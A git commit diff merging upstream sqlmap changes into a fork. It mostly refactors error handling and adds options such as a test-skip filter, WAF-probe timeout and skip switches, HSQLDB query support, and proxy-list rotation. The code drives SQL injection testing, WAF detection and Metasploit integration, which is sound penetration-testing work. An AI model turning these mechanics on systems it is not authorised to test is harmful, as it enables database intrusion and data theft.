Merge remote-tracking branch 'sqlmapproject/master'

Author: cxh852456
Date: 2015-10-16 09:32:45 +08:00
Commit: 2914574b9b
90 changed files with 2264 additions and 1486 deletions

View File

@ -173,6 +173,9 @@ Ivan Giacomelli, <truemilk(at)insiberia.net>
* for suggesting a minor enhancement
* for reviewing the documentation
Dimitris Giannitsaros, <daremon(at)gmail.com>
* for contributing a REST-JSON API client
Nico Golde, <nico(at)ngolde.de>
* for reporting a couple of bugs

View File

@ -76,7 +76,7 @@ def main(src, dst):
# Instantiate an IP packets decoder
decoder = ImpactDecoder.IPDecoder()
while 1:
while True:
cmd = ''
# Wait for incoming replies

View File

@ -22,6 +22,7 @@ from lib.core.common import findDynamicContent
from lib.core.common import Format
from lib.core.common import getLastRequestHTTPError
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import getSortedInjectionTests
from lib.core.common import getUnicode
from lib.core.common import intersect
@ -38,6 +39,7 @@ from lib.core.common import singleTimeWarnMessage
from lib.core.common import urlencode
from lib.core.common import wasLastResponseDBMSError
from lib.core.common import wasLastResponseHTTPError
from lib.core.defaults import defaults
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
@ -67,6 +69,7 @@ from lib.core.settings import URI_HTTP_HEADER
from lib.core.settings import UPPER_RATIO_BOUND
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
from lib.core.settings import IDS_WAF_CHECK_RATIO
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
from lib.core.threads import getCurrentThreadData
from lib.request.connect import Connect as Request
from lib.request.inject import checkBooleanExpression
@ -204,6 +207,16 @@ def checkSqlInjection(place, parameter, value):
logger.debug(debugMsg)
continue
# Skip tests if title, vector or DBMS is included by the
# given skip filter
if conf.testSkip and any(conf.testSkip in str(item) or \
re.search(conf.testSkip, str(item), re.I) for item in \
(test.title, test.vector, payloadDbms)):
debugMsg = "skipping test '%s' because its " % title
debugMsg += "name/vector/DBMS is included by the given skip filter"
logger.debug(debugMsg)
continue
if payloadDbms is not None:
# Skip DBMS-specific test if it does not match the user's
# provided DBMS
@ -1139,12 +1152,12 @@ def checkWaf():
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
"""
if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline)):
if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)):
return None
dbmMsg = "heuristically checking if the target is protected by "
dbmMsg += "some kind of WAF/IPS/IDS"
logger.debug(dbmMsg)
infoMsg = "checking if the target is protected by "
infoMsg += "some kind of WAF/IPS/IDS"
logger.info(infoMsg)
retVal = False
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
@ -1152,12 +1165,16 @@ def checkWaf():
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
pushValue(conf.timeout)
conf.timeout = IDS_WAF_CHECK_TIMEOUT
try:
retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
except SqlmapConnectionException:
retVal = True
finally:
kb.matchRatio = None
conf.timeout = popValue()
if retVal:
warnMsg = "heuristics detected that the target "
@ -1172,6 +1189,10 @@ def checkWaf():
if output and output[0] in ("Y", "y"):
conf.identifyWaf = True
if conf.timeout == defaults.timeout:
logger.warning("dropping timeout to %d seconds (i.e. '--timeout=%d')" % (IDS_WAF_CHECK_TIMEOUT, IDS_WAF_CHECK_TIMEOUT))
conf.timeout = IDS_WAF_CHECK_TIMEOUT
return retVal
def identifyWaf():
@ -1278,8 +1299,8 @@ def checkNullConnection():
infoMsg = "NULL connection is supported with 'skip-read' method"
logger.info(infoMsg)
except SqlmapConnectionException, errMsg:
errMsg = getUnicode(errMsg)
except SqlmapConnectionException, ex:
errMsg = getSafeExString(ex)
raise SqlmapConnectionException(errMsg)
finally:
@ -1298,7 +1319,7 @@ def checkConnection(suppressOutput=False):
raise SqlmapConnectionException(errMsg)
except socket.error, ex:
errMsg = "problem occurred while "
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, ex.message)
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
raise SqlmapConnectionException(errMsg)
if not suppressOutput and not conf.dummy and not conf.offline:
@ -1326,7 +1347,7 @@ def checkConnection(suppressOutput=False):
else:
kb.errorIsNone = True
except SqlmapConnectionException, errMsg:
except SqlmapConnectionException, ex:
if conf.ipv6:
warnMsg = "check connection to a provided "
warnMsg += "IPv6 address with a tool like ping6 "
@ -1336,7 +1357,7 @@ def checkConnection(suppressOutput=False):
singleTimeWarnMessage(warnMsg)
if any(code in kb.httpErrorCodes for code in (httplib.NOT_FOUND, )):
errMsg = getUnicode(errMsg)
errMsg = getSafeExString(ex)
logger.critical(errMsg)
if conf.multipleTargets:
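
The checkWaf() hunk above saves the current conf.timeout with pushValue(), forces the shorter IDS_WAF_CHECK_TIMEOUT for the single probe request, and restores the original value in the finally block via popValue(). A minimal standalone sketch of that save-and-restore pattern (generic names, not sqlmap's helpers):

```python
# Minimal sketch of the save/restore pattern used around the WAF probe:
# remember the configured timeout, force a short one for the single request,
# and always put the original value back, even when the request raises.
_saved = []

def push_value(value):
    _saved.append(value)

def pop_value():
    return _saved.pop()

def probe_with_short_timeout(settings, send_probe, short_timeout=10):
    push_value(settings["timeout"])
    settings["timeout"] = short_timeout
    try:
        return send_probe()
    finally:
        settings["timeout"] = pop_value()
```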

View File

@ -24,7 +24,7 @@ from lib.core.common import dataToStdout
from lib.core.common import extractRegexResult
from lib.core.common import getFilteredPageContent
from lib.core.common import getPublicTypeMembers
from lib.core.common import getUnicode
from lib.core.common import getSafeExString
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import intersect
@ -421,6 +421,7 @@ def start():
skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None))
skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None))
skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None))
skip |= (place == PLACE.HOST and intersect(PLACE.HOST, conf.skip, True) not in ([], None))
skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True))
skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True))
@ -648,7 +649,7 @@ def start():
raise
except SqlmapBaseException, ex:
errMsg = getUnicode(ex.message)
errMsg = getSafeExString(ex)
if conf.multipleTargets:
errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL")

View File

@ -187,12 +187,12 @@ class Agent(object):
if origValue:
regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
else:
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
if retVal == paramString and urlencode(parameter) != parameter:
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString)
if retVal:
retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\')
@ -308,8 +308,8 @@ class Agent(object):
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
payload = payload.replace(_, randomStr())
if origValue is not None:
payload = payload.replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
if origValue is not None and "[ORIGVALUE]" in payload:
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
if "[INFERENCE]" in payload:
if Backend.getIdentifiedDbms() is not None:
@ -480,7 +480,7 @@ class Agent(object):
@rtype: C{str}
"""
prefixRegex = r"(?:\s+(?:FIRST|SKIP)\s+\d+)*"
prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT \d+)\s+\d+)*"
fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I)
fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I)
@ -501,13 +501,17 @@ class Agent(object):
elif fieldsMinMaxstr:
fieldsToCastStr = fieldsMinMaxstr.groups()[0]
elif fieldsExists:
fieldsToCastStr = fieldsSelect.groups()[0]
if fieldsSelect:
fieldsToCastStr = fieldsSelect.groups()[0]
elif fieldsSelectTop:
fieldsToCastStr = fieldsSelectTop.groups()[0]
elif fieldsSelectRownum:
fieldsToCastStr = fieldsSelectRownum.groups()[0]
elif fieldsSelectDistinct:
fieldsToCastStr = fieldsSelectDistinct.groups()[0]
if Backend.getDbms() in (DBMS.HSQLDB,):
fieldsToCastStr = fieldsNoSelect
else:
fieldsToCastStr = fieldsSelectDistinct.groups()[0]
elif fieldsSelectCase:
fieldsToCastStr = fieldsSelectCase.groups()[0]
elif fieldsSelectFrom:
@ -584,7 +588,7 @@ class Agent(object):
else:
return query
if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
if Backend.isDbms(DBMS.MYSQL):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += ",'%s')" % kb.chars.stop
@ -611,6 +615,7 @@ class Agent(object):
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery)
elif fieldsSelect:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop
@ -881,12 +886,30 @@ class Agent(object):
fromIndex = limitedQuery.index(" FROM ")
untilFrom = limitedQuery[:fromIndex]
fromFrom = limitedQuery[fromIndex + 1:]
orderBy = False
orderBy = None
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
limitedQuery += " %s" % limitStr
elif Backend.isDbms(DBMS.HSQLDB):
match = re.search(r"ORDER BY [^ ]+", limitedQuery)
if match:
limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip()
limitedQuery += " %s" % match.group(0)
if query.startswith("SELECT "):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
limitedQuery = limitedQuery.replace("SELECT ", "SELECT %s " % limitStr, 1)
else:
limitStr = queries[Backend.getIdentifiedDbms()].limit.query2 % (1, num)
limitedQuery += " %s" % limitStr
if not match:
match = re.search(r"%s\s+(\w+)" % re.escape(limitStr), limitedQuery)
if match:
orderBy = " ORDER BY %s" % match.group(1)
elif Backend.isDbms(DBMS.FIREBIRD):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1)
limitedQuery += " %s" % limitStr

View File

@ -79,7 +79,7 @@ class BigArray(list):
self.chunks[-1] = pickle.load(fp)
except IOError, ex:
errMsg = "exception occurred while retrieving data "
errMsg += "from a temporary file ('%s')" % ex
errMsg += "from a temporary file ('%s')" % ex.message
raise SqlmapSystemException, errMsg
return self.chunks[-1].pop()
@ -99,7 +99,7 @@ class BigArray(list):
return filename
except (OSError, IOError), ex:
errMsg = "exception occurred while storing data "
errMsg += "to a temporary file ('%s'). Please " % ex
errMsg += "to a temporary file ('%s'). Please " % ex.message
errMsg += "make sure that there is enough disk space left. If problem persists, "
errMsg += "try to set environment variable 'TEMP' to a location "
errMsg += "writeable by the current user"
@ -115,7 +115,7 @@ class BigArray(list):
self.cache = Cache(index, pickle.load(fp), False)
except IOError, ex:
errMsg = "exception occurred while retrieving data "
errMsg += "from a temporary file ('%s')" % ex
errMsg += "from a temporary file ('%s')" % ex.message
raise SqlmapSystemException, errMsg
def __getstate__(self):

View File

@ -879,7 +879,7 @@ def dataToOutFile(filename, data):
f.write(data)
except IOError, ex:
errMsg = "something went wrong while trying to write "
errMsg += "to the output file ('%s')" % ex.message
errMsg += "to the output file ('%s')" % getSafeExString(ex)
raise SqlmapGenericException(errMsg)
return retVal
@ -909,14 +909,15 @@ def readInput(message, default=None, checkBatch=True):
answer = item.split('=')[1] if len(item.split('=')) > 1 else None
if answer and question.lower() in message.lower():
retVal = getUnicode(answer, UNICODE_ENCODING)
elif answer is None and retVal:
retVal = "%s,%s" % (retVal, getUnicode(item, UNICODE_ENCODING))
infoMsg = "%s%s" % (message, retVal)
logger.info(infoMsg)
if retVal:
infoMsg = "%s%s" % (message, retVal)
logger.info(infoMsg)
debugMsg = "used the given answer"
logger.debug(debugMsg)
break
debugMsg = "used the given answer"
logger.debug(debugMsg)
if retVal is None:
if checkBatch and conf.get("batch"):
@ -1369,7 +1370,7 @@ def expandAsteriskForColumns(expression):
return expression
def getLimitRange(count, dump=False, plusOne=False):
def getLimitRange(count, plusOne=False):
"""
Returns range of values used in limit/offset constructs
@ -1381,12 +1382,11 @@ def getLimitRange(count, dump=False, plusOne=False):
count = int(count)
limitStart, limitStop = 1, count
if dump:
if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:
limitStop = conf.limitStop
if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:
limitStop = conf.limitStop
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
limitStart = conf.limitStart
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
limitStart = conf.limitStart
retVal = xrange(limitStart, limitStop + 1) if plusOne else xrange(limitStart - 1, limitStop)
@ -1622,6 +1622,15 @@ def safeStringFormat(format_, params):
index = retVal.find("%s", start)
retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:]
else:
if any('%s' in _ for _ in conf.parameters.values()):
parts = format_.split(' ')
for i in xrange(len(parts)):
if PAYLOAD_DELIMITER in parts[i]:
parts[i] = parts[i].replace(PAYLOAD_DELIMITER, "")
parts[i] = "%s%s" % (parts[i], PAYLOAD_DELIMITER)
break
format_ = ' '.join(parts)
count = 0
while True:
match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
@ -1866,8 +1875,13 @@ def readCachedFileContent(filename, mode='rb'):
with kb.locks.cache:
if filename not in kb.cache.content:
checkFile(filename)
with openFile(filename, mode) as f:
kb.cache.content[filename] = f.read()
try:
with openFile(filename, mode) as f:
kb.cache.content[filename] = f.read()
except (IOError, OSError, MemoryError), ex:
errMsg = "something went wrong while trying "
errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
raise SqlmapSystemException(errMsg)
return kb.cache.content[filename]
@ -2489,7 +2503,10 @@ def extractTextTagContent(page):
page = page or ""
if REFLECTED_VALUE_MARKER in page:
page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page)
try:
page = re.sub(r"(?i)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page)
except MemoryError:
page = page.replace(REFLECTED_VALUE_MARKER, "")
return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
@ -2681,7 +2698,7 @@ def parseSqliteTableSchema(value):
table = {}
columns = {}
for match in re.finditer(r"(\w+)\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I):
for match in re.finditer(r"(\w+)[\"'`]?\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I):
columns[match.group(1)] = match.group(2)
table[conf.tbl] = columns
@ -2800,7 +2817,13 @@ def unArrayizeValue(value):
"""
if isListLike(value):
value = value[0] if len(value) > 0 else None
if not value:
value = None
elif len(value) == 1 and not isListLike(value[0]):
value = value[0]
else:
_ = filter(lambda _: _ is not None, (_ for _ in flattenValue(value)))
value = _[0] if len(_) > 0 else None
return value
@ -3008,7 +3031,7 @@ def createGithubIssue(errMsg, excMsg):
else:
warnMsg = "something went wrong while creating a Github issue"
if ex:
warnMsg += " ('%s')" % ex
warnMsg += " ('%s')" % getSafeExString(ex)
if "Unauthorized" in warnMsg:
warnMsg += ". Please update to the latest revision"
logger.warn(warnMsg)
@ -3020,7 +3043,7 @@ def maskSensitiveData(msg):
retVal = getUnicode(msg)
for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))):
for item in filter(None, map(lambda x: conf.get(x), ("hostname", "data", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))):
regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item))
while extractRegexResult(regex, retVal):
value = extractRegexResult(regex, retVal)
@ -3567,7 +3590,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
request = form.click()
except (ValueError, TypeError), ex:
errMsg = "there has been a problem while "
errMsg += "processing page forms ('%s')" % ex
errMsg += "processing page forms ('%s')" % getSafeExString(ex)
if raise_:
raise SqlmapGenericException(errMsg)
else:
@ -3670,7 +3693,7 @@ def evaluateCode(code, variables=None):
except KeyboardInterrupt:
raise
except Exception, ex:
errMsg = "an error occurred while evaluating provided code ('%s') " % ex.message
errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex)
raise SqlmapGenericException(errMsg)
def serializeObject(object_):
@ -3870,13 +3893,18 @@ def decloakToTemp(filename):
"""
content = decloak(filename)
_ = os.path.split(filename[:-1])[-1]
_ = utf8encode(os.path.split(filename[:-1])[-1])
prefix, suffix = os.path.splitext(_)
prefix = prefix.split(os.extsep)[0]
handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix)
os.close(handle)
with open(filename, "w+b") as f:
f.write(content)
return filename
def prioritySortColumns(columns):
@ -3977,3 +4005,18 @@ def pollProcess(process, suppress_errors=False):
dataToStdout(" quit unexpectedly with return code %d\n" % returncode)
break
def getSafeExString(ex, encoding=None):
"""
Safe way to get a proper exception representation as a string
(Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161')))
"""
retVal = ex
if getattr(ex, "message", None):
retVal = ex.message
elif getattr(ex, "msg", None):
retVal = ex.msg
return getUnicode(retVal, encoding=encoding)
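
getSafeExString() exists because formatting an exception that carries non-ASCII text can itself blow up under Python 2. A hedged, standalone sketch of the same idea (simplified names, not sqlmap's implementation):

```python
# Standalone sketch of the idea behind getSafeExString(): go through the
# exception's message/msg attribute and convert explicitly to unicode instead
# of letting "%s" % str(ex) raise UnicodeEncodeError on Python 2.
def safe_ex_string(ex, encoding="utf8"):
    msg = getattr(ex, "message", None) or getattr(ex, "msg", None) or ex
    if isinstance(msg, bytes):
        return msg.decode(encoding, "replace")
    return u"%s" % msg

try:
    raise Exception(u"\u0161")     # exception text containing a non-ASCII character
except Exception as ex:
    text = safe_ex_string(ex)      # safe on both Python 2 and 3
    assert text == u"\u0161"
```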

View File

@ -223,6 +223,7 @@ DEPRECATED_OPTIONS = {
"--replicate": "use '--dump-format=SQLITE' instead",
"--no-unescape": "use '--no-escape' instead",
"--binary": "use '--binary-fields' instead",
"--auth-private": "use '--auth-file' instead",
"--check-payload": None,
"--check-waf": None,
}

View File

@ -15,6 +15,7 @@ import threading
from lib.core.common import Backend
from lib.core.common import dataToDumpFile
from lib.core.common import dataToStdout
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import isListLike
from lib.core.common import normalizeUnicode
@ -74,7 +75,7 @@ class Dump(object):
try:
self._outputFP.write(text)
except IOError, ex:
errMsg = "error occurred while writing to log file ('%s')" % ex.message
errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex)
raise SqlmapGenericException(errMsg)
if kb.get("multiThreadMode"):
@ -94,7 +95,7 @@ class Dump(object):
try:
self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
except IOError, ex:
errMsg = "error occurred while opening log file ('%s')" % ex.message
errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex)
raise SqlmapGenericException(errMsg)
def getOutputFile(self):
@ -159,7 +160,7 @@ class Dump(object):
def currentDb(self, data):
if Backend.isDbms(DBMS.MAXDB):
self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL):
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB):
self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
else:
self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)
@ -635,11 +636,11 @@ class Dump(object):
for column in dbColumnsDict.keys():
if colConsider == "1":
colConsiderStr = "s like '%s' were" % unsafeSQLIdentificatorNaming(column)
colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column)
else:
colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column)
msg = "Column%s found in the " % colConsiderStr
msg = "column%s found in the " % colConsiderStr
msg += "following databases:"
self._write(msg)

View File

@ -27,6 +27,7 @@ import lib.core.common
import lib.core.threads
import lib.core.convert
import lib.request.connect
import lib.utils.google
from lib.controller.checks import checkConnection
from lib.core.common import Backend
@ -34,6 +35,7 @@ from lib.core.common import boldifyMessage
from lib.core.common import checkFile
from lib.core.common import dataToStdout
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import extractRegexResult
from lib.core.common import filterStringValue
from lib.core.common import findPageForms
@ -90,6 +92,7 @@ from lib.core.exception import SqlmapInstallationException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapSystemException
@ -638,7 +641,7 @@ def _setBulkMultipleTargets():
for line in getFileItems(conf.bulkFile):
if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
found = True
kb.targets.add((line.strip(), None, None, None, None))
kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None))
if not found and not conf.forms and not conf.crawlDepth:
warnMsg = "no usable links found (with GET parameters)"
@ -776,6 +779,7 @@ def _setMetasploit():
kb.oldMsf = True
else:
msfEnvPathExists = False
conf.msfPath = path
break
@ -806,7 +810,7 @@ def _setMetasploit():
for envPath in envPaths:
envPath = envPath.replace(";", "")
if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")):
if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")):
msfEnvPathExists = True
if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)):
kb.oldMsf = False
@ -1083,18 +1087,22 @@ def _setHTTPProxy():
if hasattr(proxyHandler, "%s_open" % _):
delattr(proxyHandler, "%s_open" % _)
if not conf.proxy:
if conf.proxyList:
conf.proxy = conf.proxyList[0]
conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1]
if conf.proxyList is not None:
if not conf.proxyList:
errMsg = "list of usable proxies is exhausted"
raise SqlmapNoneDataException(errMsg)
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
logger.info(infoMsg)
else:
if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy:
proxyHandler.proxies = {}
conf.proxy = conf.proxyList[0]
conf.proxyList = conf.proxyList[1:]
return
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
logger.info(infoMsg)
elif not conf.proxy:
if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy:
proxyHandler.proxies = {}
return
debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests"
logger.debug(debugMsg)
@ -1126,7 +1134,7 @@ def _setHTTPProxy():
if conf.proxyCred:
_ = re.search("^(.*?):(.*?)$", conf.proxyCred)
if not _:
errMsg = "Proxy authentication credentials "
errMsg = "proxy authentication credentials "
errMsg += "value must be in format username:password"
raise SqlmapSyntaxException(errMsg)
else:
@ -1257,13 +1265,13 @@ def _setHTTPAuthentication():
global authHandler
if not conf.authType and not conf.authCred and not conf.authPrivate:
if not conf.authType and not conf.authCred and not conf.authFile:
return
if conf.authPrivate and not conf.authType:
if conf.authFile and not conf.authType:
conf.authType = AUTH_TYPE.PKI
elif conf.authType and not conf.authCred and not conf.authPrivate:
elif conf.authType and not conf.authCred and not conf.authFile:
errMsg = "you specified the HTTP authentication type, but "
errMsg += "did not provide the credentials"
raise SqlmapSyntaxException(errMsg)
@ -1278,7 +1286,7 @@ def _setHTTPAuthentication():
errMsg += "Basic, Digest, NTLM or PKI"
raise SqlmapSyntaxException(errMsg)
if not conf.authPrivate:
if not conf.authFile:
debugMsg = "setting the HTTP authentication type and credentials"
logger.debug(debugMsg)
@ -1329,7 +1337,7 @@ def _setHTTPAuthentication():
debugMsg = "setting the HTTP(s) authentication PEM private key"
logger.debug(debugMsg)
_ = safeExpandUser(conf.authPrivate)
_ = safeExpandUser(conf.authFile)
checkFile(_)
authHandler = HTTPSPKIAuthHandler(_)
@ -1523,7 +1531,7 @@ def _createTemporaryDirectory():
os.makedirs(tempfile.gettempdir())
except IOError, ex:
errMsg = "there has been a problem while accessing "
errMsg += "system's temporary directory location(s) ('%s'). Please " % ex.message
errMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex)
errMsg += "make sure that there is enough disk space left. If problem persists, "
errMsg += "try to set environment variable 'TEMP' to a location "
errMsg += "writeable by the current user"
@ -1627,6 +1635,10 @@ def _cleanupOptions():
conf.testFilter = conf.testFilter.strip('*+')
conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter)
if conf.testSkip:
conf.testSkip = conf.testSkip.strip('*+')
conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip)
if "timeSec" not in kb.explicitSettings:
if conf.tor:
conf.timeSec = 2 * conf.timeSec
@ -1734,7 +1746,7 @@ def _setConfAttributes():
conf.parameters = {}
conf.path = None
conf.port = None
conf.proxyList = []
conf.proxyList = None
conf.resultsFilename = None
conf.resultsFP = None
conf.scheme = None
@ -2071,7 +2083,7 @@ def _mergeOptions(inputOptions, overrideOptions):
inputOptions = base64unpickle(inputOptions.pickledOptions)
except Exception, ex:
errMsg = "provided invalid value '%s' for option '--pickled-options'" % inputOptions.pickledOptions
errMsg += " ('%s')" % ex.message if ex.message else ""
errMsg += " ('%s')" % ex if ex.message else ""
raise SqlmapSyntaxException(errMsg)
if inputOptions.configFile:
@ -2243,7 +2255,11 @@ def _checkTor():
infoMsg = "checking Tor connection"
logger.info(infoMsg)
page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False)
try:
page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False)
except SqlmapConnectionException:
page = None
if not page or 'Congratulations' not in page:
errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'"
raise SqlmapConnectionException(errMsg)
@ -2290,6 +2306,10 @@ def _basicOptionValidation():
errMsg = "option '-d' is incompatible with option '-u' ('--url')"
raise SqlmapSyntaxException(errMsg)
if conf.identifyWaf and conf.skipWaf:
errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'"
raise SqlmapSyntaxException(errMsg)
